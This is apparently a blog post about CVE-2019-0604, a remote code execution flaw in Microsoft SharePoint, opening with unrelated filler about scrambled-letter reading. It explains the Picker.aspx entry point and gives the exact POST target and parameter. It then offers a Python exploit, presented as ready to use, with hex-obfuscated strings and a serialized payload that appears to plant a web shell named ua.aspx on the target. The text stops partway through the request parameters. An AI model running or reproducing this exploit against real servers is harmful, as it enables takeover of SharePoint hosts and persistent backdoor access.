[EXP] CVE-2019-0604 Microsoft SharePoint remote code execution exploit

Research shows that the order of the characters in a Chinese sentence does not necessarily affect reading: for example, only after you finish reading this sentence do you notice that the characters in it are all scrambled.

Research results from the University of Cambridge show that when the letters within a word are in the wrong order, you can still understand the meaning of the whole word. What matters is that the first and last letters of the word are in the correct position; the rest can be completely garbled and you can still read it clearly without difficulty. The reason is that when the brain recognizes a word, it does not rely on identifying the letters one by one, but on the whole.
Likewise, when reading Chinese characters, the brain analyzes the subject matter it has already encountered first. If the brain already holds an impression of the sentence you see, you can read it smoothly. If the brain has not processed the sentence before, then of course reading it is hard going.

The phenomenon that letters out of order within a word do not affect reading (which applies to English) has the scientific name typoglycemia; it is used to describe the cognitive process people use when reading, and has been studied for more than half a century.

The college entrance examination has only just finished, and you will see people in the groups saying that to study information security you need good English and good math to learn it well. See the Tips at the end.


Vulnerability Information

Microsoft SharePoint Remote Code Execution Vulnerability (CVE-2019-0594, CVE-2019-0604, high risk): the vulnerability is triggered because Microsoft SharePoint fails to check the source markup of an application package. An attacker could execute arbitrary code in the context of the SharePoint application pool and on the SharePoint server.

Affected:

Bugtraq ID: 	106914
Class: 	Failure to Handle Exceptional Conditions
CVE: 	CVE-2019-0604
Remote: 	Yes
Local: 	No
Published: 	Feb 12 2019 12:00AM
Updated: 	Feb 12 2019 12:00AM
Credit: 	Markus Wulftange (@mwulftange) working with Trend Micro's Zero Day Initiative
Vulnerable: 	Microsoft SharePoint Server 2016 0
Microsoft SharePoint Server 2010 SP2
Microsoft SharePoint Foundation 2013 SP1
- Microsoft IIS 5.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft SharePoint Enterprise Server 2016 0

 

Attack entry point

The ItemPicker web control is actually never used in any .aspx page. But looking at the usages of its base type, EntityEditorWithPicker, the file /_layouts/15/Picker.aspx uses it.

That page requires the type of the picker dialog to be supplied in the form of the PickerDialogType URL parameter. Here, either of the two ItemPickerDialog types can be used:

· Microsoft.SharePoint.WebControls.ItemPickerDialog in Microsoft.SharePoint.dll
· Microsoft.SharePoint.Portal.WebControls.ItemPickerDialog in Microsoft.SharePoint.Portal.dll

With the first PickerDialogType type:

 

PoC

When the submitted value of the form field ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData begins with "__" (such as "__dummy"),

a breakpoint on EntityInstanceIdEncoder.DecodeEntityInstanceId(string) is hit with the call stack shown below; when the other ItemPickerDialog type is used instead, the two call stacks differ only at the top.

This shows that the ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData data ends up in EntityInstanceIdEncoder.DecodeEntityInstanceId(string). What remains is only to construct the entity instance ID and the XmlSerializer payload.

 

Supplement:

The author says you only need to construct an XML serialization payload, but where is the payload submitted to?

The original text only gives half of it. The complete POST and its specific parameters are as follows:

URL: /Picker.aspx?PickerDialogType=<assembly-qualified name of the control>

Parameters: ctl00%24PlaceHolderDialogBodySection%24ctl05%24hiddenSpanData=payload

In fact, accessing Picker.aspx requires the other parameters as well; when I tested, submitting the form without the other parameters failed.

 

I wanted to set up an environment to test this when the vulnerability analysis article came out, but on the first day I found the installer I had downloaded was wrong,

and since the project did not fit my plans and setting up the environment was a waste of time, I got lazy and put it aside for a while.

Today I found the half-finished work from last week and studied it a little more.

 

For more details, please see the original article. I think many people have seen it, and the so-called principle is something many people can explain;

what everyone is waiting for is a truly usable EXP, hahaha. I am the legendary hacker "chicken, you're so beautiful!"

Original (English): https://www.thezdi.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability

Translation (Chinese): https://www.anquanke.com/post/id/173476

 

EXP

#cve-2019-0604 SharePoint RCE exploit
#date: 20190618 #author: k8gege
import urllib
import urllib2
import sys
import requests
url0 = sys.argv[1]
url1 = '/_layouts/15/Picker.aspx?PickerDialogType='
url = url0 + url1 
shellurl=url0+'/_layouts/15/ua.aspx'
exp='\x63\x76\x65\x2D\x32\x30\x31\x39\x2D\x30\x36\x30\x34\x20\x53\x68\x61\x72\x65\x50\x6F\x69\x6E\x74\x20\x52\x43\x45\x20\x65\x78\x70\x6C\x6F\x69\x74'
paySpanData='\x63\x74\x6C\x30\x30\x24\x50\x6C\x61\x63\x65\x48\x6F\x6C\x64\x65\x72\x44\x69\x61\x6C\x6F\x67\x42\x6F\x64\x79\x53\x65\x63\x74\x69\x6F\x6E\x24\x63\x74\x6C\x30\x35\x24\x68\x69\x64\x64\x65\x6E\x53\x70\x61\x6E\x44\x61\x74\x61';
paySection='\x50\x6C\x61\x63\x65\x48\x6F\x6C\x64\x65\x72\x44\x69\x61\x6C\x6F\x67\x42\x6F\x64\x79\x53\x65\x63\x74\x69\x6F\x6E'
ct1='\x63\x74\x6C\x30\x30\x24'
ct2='\x24\x63\x74\x6C\x30\x35'
spver = '\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x53\x68\x61\x72\x65\x50\x6F\x69\x6E\x74\x2E\x57\x65\x62\x43\x6F\x6E\x74\x72\x6F\x6C\x73\x2E\x49\x74\x65\x6D\x50\x69\x63\x6B\x65\x72\x44\x69\x61\x6C\x6F\x67\x2C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x53\x68\x61\x72\x65\x50\x6F\x69\x6E\x74\x2C\x56\x65\x72\x73\x69\x6F\x6E\x3D\x31\x35\x2E\x30\x2E\x30\x2E\x30\x2C\x43\x75\x6C\x74\x75\x72\x65\x3D\x6E\x65\x75\x74\x72\x61\x6C\x2C\x50\x75\x62\x6C\x69\x63\x4B\x65\x79\x54\x6F\x6B\x65\x6E\x3D\x37\x31\x65\x39\x62\x63\x65\x31\x31\x31\x65\x39\x34\x32\x39\x63'
uapay='\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74'
payload1='\x5F\x5F\x62\x70\x38\x32\x63\x31\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x65\x32\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x65\x32\x30\x30\x33\x35\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x36\x37\x30\x30\x39\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x65\x32\x30\x30\x39\x34\x30\x30\x65\x36\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x65\x36\x30\x30\x31\x36\x30\x30\x63\x36\x30\x30\x65\x32\x30\x30\x35\x34\x30\x30\x38\x37\x30\x30\x30\x37\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x34\x36\x30\x30\x37\x35\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x30\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x30\x36\x30\x30\x32\x33\x30\x30\x62\x35\x30\x30\x62\x35\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x65\x32\x30\x30\x37\x35\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x66\x36\x30\x30\x37\x37\x30\x30\x33\x37\x30\x30\x65\x32\x30\x30\x64\x34\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x62\x36\x30\x30\x35\x37\x30\x30\x30\x37\x30\x30\x65\x32\x30\x30\x38\x35\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x32\x35\x30\x30\x35\x36\x30\x30\x31\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x63\x32\x30\x30\x30\x32\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x35\x36\x30\x30\x65\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x39\x36\x30\x30\x66\x36\x30\x30\x65\x36\x30\x30\x36\x34\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x37\x37\x30\x30\x66\x36\x30\x30\x32\x37\x30\x30\x62\x36\x30\x30\x63\x32\x30\x30\x30\x32\x30\x30\x36\x35\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x33\x37\x30\x30\x39\x36\x30\x30\x66\x36\x30\x30\x65\x36\x30\x30\x64\x33\x30\x30\x34\x33\x30\x30\x65\x32\x30\x30\x30\x33\x30\x30\x65\x32\x30\x30\x30\x33\x30\x30\x65\x32\x30\x30\x30\x33\x30\x30\x63\x32\x30\x30\x30\x
32\x30\x30\x33\x34\x30\x30\x35\x37\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x35\x37\x30\x30\x32\x37\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x65\x36\x30\x30\x35\x36\x30\x30\x35\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x63\x36\x30\x30\x63\x32\x30\x30\x30\x32\x30\x30\x30\x35\x30\x30\x35\x37\x30\x30\x32\x36\x30\x30\x63\x36\x30\x30\x39\x36\x30\x30\x33\x36\x30\x30\x62\x34\x30\x30\x35\x36\x30\x30\x39\x37\x30\x30\x34\x35\x30\x30\x66\x36\x30\x30\x62\x36\x30\x30\x35\x36\x30\x30\x65\x36\x30\x30\x64\x33\x30\x30\x33\x33\x30\x30\x31\x33\x30\x30\x32\x36\x30\x30\x36\x36\x30\x30\x33\x33\x30\x30\x38\x33\x30\x30\x35\x33\x30\x30\x36\x33\x30\x30\x31\x36\x30\x30\x34\x36\x30\x30\x33\x33\x30\x30\x36\x33\x30\x30\x34\x33\x30\x30\x35\x36\x30\x30\x33\x33\x30\x30\x35\x33\x30\x30\x64\x35\x30\x30\x63\x32\x30\x30\x62\x35\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x65\x32\x30\x30\x37\x35\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x66\x36\x30\x30\x37\x37\x30\x30\x33\x37\x30\x30\x65\x32\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x65\x32\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30'
payload2='\x38\x37\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x30\x32\x30\x30\x36\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x33\x37\x30\x30\x39\x36\x30\x30\x66\x36\x30\x30\x65\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x31\x33\x30\x30\x65\x32\x30\x30\x30\x33\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x35\x36\x30\x30\x65\x36\x30\x30\x33\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x35\x37\x30\x30\x34\x37\x30\x30\x36\x36\x30\x30\x64\x32\x30\x30\x31\x33\x30\x30\x36\x33\x30\x30\x32\x32\x30\x30\x66\x33\x30\x30\x65\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x63\x33\x30\x30\x35\x34\x30\x30\x38\x37\x30\x30\x30\x37\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x34\x36\x30\x30\x37\x35\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x30\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x66\x34\x30\x30\x36\x36\x30\x30\x38\x35\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x32\x35\x30\x30\x35\x36\x30\x30\x31\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x36\x37\x30\x30\x39\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x38\x37\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x61\x33\x30\x30\x38\x37\x30\x30\x33\x37\x30\x30\x39\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x38\x36\x30\x30\x34\x37\x30\x30\x34\x37\x30\x30\x30\x37\x30\x30\x61\x33\x30\x30\x66\x32\x30\x30\x66\x32\x30\x30\x37\x37\x30\x30\x37\x37\x30\x30\x37\x37\x30\x30\x65\x32\x30\x30\x37\x37\x30\x30\x33\x33\x30\x30\x65\x32\x30\x30\x66\x36\x30\x30\x32\x37\x30\x30\x37\x36\x30\x30\x66\x32\x30\x30\x32\x33\x30\x30\x30\x33\x30\x30\x30\x33\x30\x30\x31\x33\x30\x30\x66\x32\x30\x30\x38\x35\x30\x30\x64\x34\x30\x30\x63\x34\x30\x30\x33\x35\x30\x30\x33\x
36\x30\x30\x38\x36\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x31\x36\x30\x30\x64\x32\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x38\x37\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x61\x33\x30\x30\x38\x37\x30\x30\x33\x37\x30\x30\x34\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x38\x36\x30\x30\x34\x37\x30\x30\x34\x37\x30\x30\x30\x37\x30\x30\x61\x33\x30\x30\x66\x32\x30\x30\x66\x32\x30\x30\x37\x37\x30\x30\x37\x37\x30\x30\x37\x37\x30\x30\x65\x32\x30\x30\x37\x37\x30\x30\x33\x33\x30\x30\x65\x32\x30\x30\x66\x36\x30\x30\x32\x37\x30\x30\x37\x36\x30\x30\x66\x32\x30\x30\x32\x33\x30\x30\x30\x33\x30\x30\x30\x33\x30\x30\x31\x33\x30\x30\x66\x32\x30\x30\x38\x35\x30\x30\x64\x34\x30\x30\x63\x34\x30\x30\x33\x35\x30\x30\x33\x36\x30\x30\x38\x36\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x31\x36\x30\x30\x32\x32\x30\x30\x65\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x63\x33\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x34\x36\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x34\x37\x30\x30\x39\x37\x30\x30\x30\x33\x30\x30\x65\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x63\x33\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x39\x34\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x30\x32\x30\x30\x38\x37\x30\x30\x33\x37\x30\x30\x39\x36\x30\x30\x61\x33\x30\x30\x34\x37\x30\x30\x39\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x38\x35\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x32\x35\x30\x30\x35\x36\x30\x30\x31\x36\x30\x30\x34\x36\x30\x30\x35\x
36\x30\x30\x32\x37\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x66\x32\x30\x30\x65\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x63\x33\x30\x30\x64\x34\x30\x30\x35\x36\x30\x30\x34\x37\x30\x30\x38\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x65\x34\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x65\x33\x30\x30\x30\x35\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x33\x37\x30\x30'
payload3='\x61\x33\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x62\x33\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x33\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x32\x36\x30\x30\x63\x36\x30\x30\x39\x37\x30\x30\x64\x33\x30\x30\x64\x36\x30\x30\x33\x37\x30\x30\x33\x36\x30\x30\x66\x36\x30\x30\x32\x37\x30\x30\x63\x36\x30\x30\x39\x36\x30\x30\x32\x36\x30\x30\x32\x32\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x38\x37\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x61\x33\x30\x30\x34\x34\x30\x30\x39\x36\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x33\x36\x30\x30\x63\x36\x30\x30\x32\x37\x30\x30\x64\x32\x30\x30\x65\x36\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x30\x37\x30\x30\x31\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x61\x33\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x65\x32\x30\x30\x34\x34\x30\x30\x39\x36\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x65\x36\x30\x30\x66\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x39\x36\x30\x30\x33\x36\x30\x30\x33\x37\x30\x30\x62\x33\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x33\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x32\x36\x30\x30\x63\x36\x30\x30\x39\x37\x30\x30\x64\x33\x30\x30\x33\x37\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x32\x32\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x39\x30\x30\x30\x36\x32\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x36\x37\x30\x30\x39\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x38\x37\x30\x30\x61\x33\x30\x30\x62\x34\x30\x30\x35\x36\x30\x30\x39\x37\x30\x30\x64\x
33\x30\x30\x32\x32\x30\x30\x63\x34\x30\x30\x31\x36\x30\x30\x35\x37\x30\x30\x65\x36\x30\x30\x33\x36\x30\x30\x38\x36\x30\x30\x33\x34\x30\x30\x31\x36\x30\x30\x63\x36\x30\x30\x33\x36\x30\x30\x38\x36\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x34\x35\x30\x30\x39\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x62\x37\x30\x30\x38\x37\x30\x30\x61\x33\x30\x30\x34\x35\x30\x30\x39\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x30\x32\x30\x30\x34\x34\x30\x30\x39\x36\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x61\x33\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x33\x37\x30\x30\x64\x37\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x64\x34\x30\x30\x35\x36\x30\x30\x34\x37\x30\x30\x38\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x65\x34\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x33\x35\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x34\x37\x30\x30\x32\x32\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x36\x32\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x36\x37\x30\x30\x39\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x65\x32\x30\x30\x64\x34\x30\x30\x35\x36\x30\x30\x34\x37\x30\x30\x38\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x30\x35\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x33\x37\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x36\x32\x30\x30\x63\x
36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x61\x33\x30\x30\x33\x35\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x33\x36\x30\x30\x64\x36\x30\x30\x34\x36\x30\x30\x36\x32\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x66\x32\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x61\x33\x30\x30\x33\x35\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x36\x32\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x61\x33\x30\x30\x33\x35\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x66\x32\x30\x30\x33\x36\x30\x30\x30\x32\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x38\x36\x30\x30\x66\x36\x30\x30\x30\x32\x30\x30\x65\x35\x30\x30\x36\x32\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x30\x37\x30\x30\x62\x33\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x35\x32\x30\x30\x30\x34\x30\x30\x30\x32\x30\x30\x30\x35\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x35\x36\x30\x30\x30\x32\x30\x30\x63\x34\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x61\x34\x30\x30\x33\x37\x30\x30\x33\x36\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x30\x37\x30\x30\x34\x37\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x35\x32\x30\x30\x65\x35\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x65\x35\x30\x30\x36\x32\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x30\x
37\x30\x30\x62\x33\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x35\x32\x30\x30\x36\x37\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x30\x37\x30\x30\x37\x37\x30\x30\x34\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x34\x37\x30\x30\x66\x36\x30\x30\x64\x36\x30\x30\x32\x32\x30\x30\x62\x33\x30\x30\x36\x37\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x64\x33\x30\x30\x32\x35\x30\x30\x35\x36\x30\x30\x31\x37\x30\x30\x35\x37\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x65\x32\x30\x30\x35\x35\x30\x30\x33\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x31\x34\x30\x30\x37\x36\x30\x30\x35\x36\x30\x30\x65\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x39\x36\x30\x30\x36\x36\x30\x30\x30\x32\x30\x30\x38\x32\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x65\x32\x30\x30\x33\x35\x30\x30\x35\x37\x30\x30\x32\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x38\x32\x30\x30\x30\x33\x30\x30\x63\x32\x30\x30\x30\x32\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x65\x32\x30\x30\x39\x34\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x38\x37\x30\x30\x66\x34\x30\x30\x36\x36\x30\x30\x38\x32\x30\x30\x32\x32\x30\x30\x64\x33\x30\x30\x64\x33\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x39\x32\x30\x30\x39\x32\x30\x30\x64\x33\x30\x30\x64\x33\x30\x30\x30\x32\x30\x30\x30\x37\x30\x30\x37\x37\x30\x30\x34\x36\x30\x30\x39\x32\x30\x30\x30\x32\x30\x30\x62\x37\x30\x30\x36\x37\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x33\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30'
payload4='\x74\x6F\x6D\x3D\x3D\x3D\x52\x65\x73\x70\x6F\x6E\x73\x65\x2E\x57\x72\x69\x74\x65\x28\x22\x55\x41\x73\x68\x65\x6C\x6C\x22\x29\x3B'
payload5='\x23\x64\x61\x74\x65\x3A\x20\x32\x30\x31\x39\x30\x36\x32\x36\x20\x23\x61\x75\x74\x68\x6F\x72\x3A\x20\x6B\x38\x67\x65\x67\x65'

values = {'__REQUESTDIGEST':'0xF4545A48FA093FD290D386F2E317C72EF439C05EABDC8BDF0D81022DAEFE10FF6D4782A17836870BB0EBF673E71DCD6F7E631A1371319881902FDEF3032A16F4,18 Jun 2019 16:41:35 -0000',
'__EVENTTARGET':'',
'__EVENTARGUMENT':'',
